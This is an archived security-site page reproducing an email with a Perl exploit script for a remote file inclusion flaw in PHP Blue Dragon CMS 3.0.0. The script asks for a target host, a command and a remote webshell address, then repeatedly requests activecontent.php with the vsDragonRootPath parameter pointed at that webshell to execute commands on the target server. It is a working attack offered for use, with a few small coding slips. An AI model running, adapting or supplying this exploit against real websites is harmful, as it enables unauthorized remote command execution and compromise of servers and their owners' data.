TUCoPS :: Web :: CMS / Portals :: tb12066.htm

PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit)
PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit)
PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit)


This is a multi-part message in MIME format.
--------------000201000105070400010103
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Exploit is attached.

E.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org 

iD8DBQFGwRXDmErIuzAYjw8RApkJAKCkxFrH2XmwTS37D0B8BmaFe47EkwCgs5Uc
6XtVfkHyqOVv51uylzwT3WQ=49Nv
-----END PGP SIGNATURE-----


--------------000201000105070400010103
Content-Type: application/x-perl;
 name="egs-fuckphpbluedragon300.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="egs-fuckphpbluedragon300.pl"

#!usr/bin/perl

#
#  egs-fuckphpbluedragon300.pl
#
# * Copyright 2007 Emanuele Gentili  
# *
# * www.emanuele-gentili.com 
# *
# *      This program is free software; you can redistribute it and/or modify
# *      it under the terms of the GNU General Public License as published by
# *      the Free Software Foundation; either version 2 of the License, or
# *      (at your option) any later version.
# *
# *      This program is distributed in the hope that it will be useful,
# *      but WITHOUT ANY WARRANTY; without even the implied warranty of
# *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# *      GNU General Public License for more details.
# *
# *      You should have received a copy of the GNU General Public License
# *      along with this program; if not, write to the Free Software
# *      Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# *
# 
# README:
#
# PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability 
# http://phpbluedragon.pl 
# 

use IO::Socket

print "\n [+] Insert Hostname: ";
chomp ($host=);
print "\n [+] Insert webserver port (example: 80): ";
chomp (${port}=);
print "\n [+] Insert path: (example: /public_includes/pub_blocks/):  ";
chomp (${path}=);
print "\n [+] Command to execute:  ";
chomp (${cmd}=);
print "\n [+] Insert webshell address: ";
chomp (${shell}=);

while(${cmd} !~ "QUIT") {
${sock} = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"${host}", PeerPort=>"${port}")
            or die " [+] Connecting ... Can't connect to host.\n\n";
            print $sock "GET $path"."activecontent.php?vsDragonRootPath="."${shell}"."?cmd="."${cmd}"."? HTTP/1.1\r\n";
            print $sock "Host: ${host}\r\n";
	    print $sock "User-Agent: EG Security\n";
            print $sock "Accept: */*\r\n";
            print $sock "Connection: close\r\n\n";
while (${answer} = <${socket}>)
    {
        print "${answer}";
}
}

--------------000201000105070400010103--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH